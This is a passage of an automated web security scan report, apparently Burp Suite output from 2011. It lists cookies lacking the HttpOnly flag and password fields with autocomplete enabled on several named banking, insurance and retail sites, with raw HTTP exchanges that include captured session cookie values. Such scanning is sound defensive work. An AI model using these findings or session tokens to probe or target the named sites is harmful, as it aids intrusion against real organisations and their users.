ETag: "f09e7aaa686cc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:05 GMT

......JFIF.....d.d......Ducky.......7......Adobe.d....................
...
.    ..    ..................................##########...............#################################################...........
...[SNIP]...
8.157. https://www.regions.com/virtualMedia/img3107.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img3107.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /virtualMedia/img3107.jpg HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 6714
Content-Type: image/jpeg
Last-Modified: Fri, 29 Apr 2011 19:47:10 GMT
Accept-Ranges: bytes
ETag: "a0d87c3aa66cc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:05 GMT

......JFIF.....d.d......Ducky.......2......Adobe.d..........................
..
.......................#"""#''''''''''.    ..    
   .        ...................................!! !!''''''''''......x....
...[SNIP]...
8.158. https://www.regions.com/virtualMedia/img3108.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img3108.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img3108.jpg HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWW.REGIONS.COM-HTTP=R825062118; ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WWW.REGIONS.COM-HTTPS=R492750743

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R492750743; path=/
Content-Length: 6824
Content-Type: image/jpeg
Last-Modified: Fri, 29 Apr 2011 19:47:23 GMT
Accept-Ranges: bytes
ETag: "60eb1a42a66cc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:16:23 GMT

......JFIF.....d.d......Ducky.......2......Adobe.d..........................
..
.......................#"""#''''''''''.    ..    
   .        ...................................!! !!''''''''''......x....
...[SNIP]...
8.159. https://www.regions.com/virtualMedia/img3132.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img3132.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /virtualMedia/img3132.jpg HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 7184
Content-Type: image/jpeg
Last-Modified: Wed, 04 May 2011 18:55:25 GMT
Accept-Ranges: bytes
ETag: "80abd2d38cacc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:05 GMT

......JFIF.....d.d......Ducky.......2......Adobe.d..........................
..
.......................#"""#''''''''''.    ..    
   .        ...................................!! !!''''''''''......x....
...[SNIP]...
8.160. https://www.regions.com/virtualMedia/img506.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img506.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /virtualMedia/img506.gif HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=prefplus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555468317:ss=1305555382886; WWW.REGIONS.COM-HTTPS=R492750743

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R492750743; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 4606
Content-Type: image/gif
Last-Modified: Wed, 26 Sep 2007 18:49:52 GMT
Accept-Ranges: bytes
ETag: "5032cc56e0c81:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:09 GMT

GIF89a..<.........(...f..T..........Ir.&..K............Y........T...................y..i................................W...........`.............................................[........O..........    .
...[SNIP]...
8.161. http://www.regionsmortgage.com/BeforeYouBegin/ApplyNow  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regionsmortgage.com
Path:   /BeforeYouBegin/ApplyNow

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BeforeYouBegin/ApplyNow HTTP/1.1
Host: www.regionsmortgage.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 9578
Set-Cookie: NSC_uppmt.sfhjpot.dpn-xfc-wjq=ffffffffaf130ef045525d5f4f58455e445a4a423660;path=/
Set-Cookie: NSC_uppmt.sfhjpotnpsuhbhf-xxx=ffffffffaf130d4c45525d5f4f58455e445a4a423660;path=/
Content-Length: 9578


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   
   Region
...[SNIP]...
8.162. http://www.xsnet.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xsnet.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.xsnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41050
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=aFDnln1KzAEkAAAAOTU2Y2ZhYjAtNjUwZS00Mjk0LTg2NGEtMzAyZjJkOWZjMGYx0; expires=Mon, 25-Jul-2011 03:47:35 GMT; path=/; HttpOnly
Date: Mon, 16 May 2011 17:07:35 GMT
Set-Cookie: HUBSPOT32=236000428.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head id="Head">

<script type="text/javascript">
//<!
...[SNIP]...
8.163. http://xsinternational.app6.hubspot.com/salog.js.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xsinternational.app6.hubspot.com
Path:   /salog.js.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /salog.js.aspx HTTP/1.1
Host: xsinternational.app6.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.xsnet.com/

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 498
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=QPwMRr0yzQEkAAAAMTU2ZDI3OTQtNDczYi00ZDAzLWIxMmItM2UzODNhZTI0NThl0; expires=Tue, 15-May-2012 17:07:56 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=86af4891-a613-46df-8156-05a4fd7b2019; domain=xsinternational.app6.hubspot.com; expires=Sun, 16-May-2021 05:00:00 GMT; path=/; HttpOnly
Date: Mon, 16 May 2011 17:07:56 GMT
Set-Cookie: HUBSPOT39=252777644.0.0000; path=/


var hsUse20Servers = true;
var hsDayEndsIn = 39123;
var hsWeekEndsIn = 557523;
var hsMonthEndsIn = 1335123;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-05-16 13:07
...[SNIP]...
9. Password field with autocomplete enabled  previous  next
There are 18 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

9.1. http://cigna.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cigna.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:29:10 GMT
Content-type: text/html
Cache-control: no-cache
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<!--Note: formatting/beautifying this code seems to break something. Leave as-is. -->

<html>
<head>

...[SNIP]...
<table class="homeLogIn">
   <form name="frmLogin" id="frmLogin" method="post" action="" onSubmit="return submitLogin();">
   <input type="hidden" name="TARGET" value="">
...[SNIP]...
<td>
           <input type="password" maxLength="32" size="22" name="PASSWORD" style="width:125px; height:15px;" class="portal">
       </td>
...[SNIP]...
9.2. https://cignaforhcp.cigna.com/wps/portal  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://cignaforhcp.cigna.com
Path:   /wps/portal

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

POST /wps/portal HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
Referer: https://cignaforhcp.cigna.com/
Cache-Control: max-age=0
Origin: https://cignaforhcp.cigna.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=92964B127FD1107FCAD3A536181C0CE6
Content-Length: 0

Response

HTTP/1.1 200 OK
content-language: en-US
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:31:34 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 20913
ibm-web2-location: /wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hnd0cPE3MfAwN_ozADAyM_0-BAg9BgYwNfQ_1wkA6zeAMcwNFA388jPzdVvyA7rxwABvDatQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: no-cache
pragma: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID_CHCP=0001qDHqEZIhYEkdLt4C0F9Adey:1DE5MNIG9P; Path=/
Set-Cookie: PD_STATEFUL_31b6dc34-289d-11e0-8e97-2054895daa77=%2Fwps; Path=/
Content-Length: 20575


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" xmlns="http://www.w3.org/
...[SNIP]...
<td colspan="2">
                   <form name="cignaLoginForm" method="post" action="/pkmslogin.form" >
                       <input type="text" name="USERNAME" size="12" maxlength="32" value="">
...[SNIP]...
<td>
               <input type="password" name="PASSWORD" size="14" maxlength="15">
               </td>
...[SNIP]...
9.3. https://www.frontrowusa.com/Cart/Address  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.frontrowusa.com
Path:   /Cart/Address

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /Cart/Address HTTP/1.1
Host: www.frontrowusa.com
Connection: keep-alive
Referer: http://www.frontrowusa.com/Event/U2_Rescheduled_from_6/12/2010_Invesco_Field_at_Mile_High_U2_2011-05-21_7:00_PM_Tickets.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=kqn1ntpgpqlhum119dfp66bjp0; __utmz=51375870.1305559365.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=51375870.67819784.1305559365.1305559365.1305559365.1; __utmc=51375870; __utmb=51375870.7.10.1305559365

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:27:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<div id="cart">
           <form id="CheckoutForm" method="post" action="/Cart/Address" onSubmit="return checkTerms();">
       <input id="formAction" type="hidden" name="action" value="update" />
...[SNIP]...
<td><input type="password" name="order[Password1]" value="" /></td>
...[SNIP]...
<td><input type="password" name="order[Password2]" value="" /></td>
...[SNIP]...
9.4. https://www.frontrowusa.com/members/login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.frontrowusa.com
Path:   /members/login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /members/login HTTP/1.1
Host: www.frontrowusa.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=kqn1ntpgpqlhum119dfp66bjp0; __utmz=51375870.1305559365.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=51375870.67819784.1305559365.1305559365.1305559365.1; __utmc=51375870; __utmb=51375870.2.10.1305559365

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:26:12 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
</h2>
               <form method="post" action="/members/login">
           <div>
...[SNIP]...
</label><input id="login_password" type="password" name="Password" /></div>
...[SNIP]...
9.5. http://www.paperg.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 15:19:13 GMT
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Via: 1.1 AN-0016020122637050
Content-Length: 11476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...
9.6. http://www.paperg.com/company.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /company.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /company.php HTTP/1.1
Host: www.paperg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/
Cookie: PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmb=1.5.10.1305557438; __utmc=1; __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27786045.1907620487.1305558925.1305558925.1305558925.1; __utmb=27786045; __utmc=27786045; __utmz=27786045.1305558925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:38 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 15:19:38 GMT
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 11250

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...
9.7. http://www.paperg.com/contact.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /contact.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /contact.php HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 15:19:13 GMT
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Via: 1.1 AN-0016020122637050
Content-Length: 11383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...
9.8. http://www.paperg.com/join.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /join.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /join.php HTTP/1.1
Host: www.paperg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/support.php
Cookie: PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305561344.2; __utmc=1; __utmz=1.1305561344.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=27786045.1907620487.1305558925.1305558925.1305561354.2; __utmc=27786045; __utmz=27786045.1305558925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=1.1.10.1305561344; __utmb=27786045

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 16:14:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 12598


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...
9.9. http://www.paperg.com/press.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /press.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /press.php HTTP/1.1
Host: www.paperg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.placelocal.com/
Cookie: PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305561344.2; __utmc=1; __utmz=1.1305561344.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=27786045.1907620487.1305558925.1305558925.1305561354.2; __utmc=27786045; __utmz=27786045.1305558925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=1.1.10.1305561344; __utmb=27786045

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 16:20:32 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 13132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...
9.10. http://www.paperg.com/publishers/flyerboard.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /publishers/flyerboard.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /publishers/flyerboard.php HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
